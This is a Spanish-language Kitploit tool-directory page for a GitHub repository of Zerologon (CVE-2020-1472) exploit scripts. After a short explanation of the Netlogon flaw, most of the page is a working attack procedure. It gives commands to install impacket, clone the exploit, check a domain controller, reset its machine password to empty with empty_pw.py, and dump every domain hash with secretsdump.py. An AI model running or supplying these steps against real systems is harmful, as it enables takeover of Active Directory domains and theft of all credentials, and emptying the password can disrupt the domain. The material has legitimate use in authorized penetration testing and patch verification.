Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
zerologon — Conjunto de scripts para probar y explotar la vulnerabilidad zerologon (CVE-2020-1472). | Kitploit
Herramientas/GitHubGitHub/carlos55ml/zerologon
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónMovimiento LateralPruebas de Penetración
GitHubcarlos55ml/zerologon

zerologon

Conjunto de scripts para probar y explotar la vulnerabilidad zerologon (CVE-2020-1472).

Ver Repositorio
2hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Zerologon

Conjunto de scripts para probar y explotar la vulnerabilidad zerologon (CVE-2020-1472)


banner

¿Qué es?

ZeroLogon es una vulnerabilidad que nos permite explotar una falla criptográfica en el Protocolo remoto de Netlogon de Active Directory de Microsoft (MS-NRPC), que permite a los usuarios iniciar sesión en servidores usando NTLM.


Pasos previos

Antes de ejecutar el exploit debemos saber que necesitamos una versión diferente de impacket; para ello haremos lo siguiente.

apt remove --purge impacket-scripts python3-impacket

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

pip install .


PoC (Prueba de concepto)

git clone https://github.com/Nekoox/zerologon.git

cd zerologon

pip install -r requirements.txt

Comprobar si el controlador de dominio víctima es vulnerable a zerologon.

python3 tester.py <DC-NAME> <ip-address>

En caso de que el DC víctima sea vulnerable, aparecerá un mensaje que dirá "Success! DC can be fully compromised by a Zerologon attack."

De lo contrario, es decir, si el DC víctima no es vulnerable porque el agujero de seguridad ha sido parcheado, obtendremos el siguiente mensaje: "Attack failed. Target is probably patched."


Cambiar la contraseña del controlador de dominio vulnerable a una cadena vacía.

python3 empty_pw.py <DC-NAME> <ip-address>

Si el controlador de dominio es vulnerable, después de ejecutar el exploit no debería tener ninguna contraseña.

Volcar los hashes del controlador de dominio.

> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>

Al ejecutar esto, podremos ver todos los hashes del dominio, sin ninguna credencial.

Descargar herramienta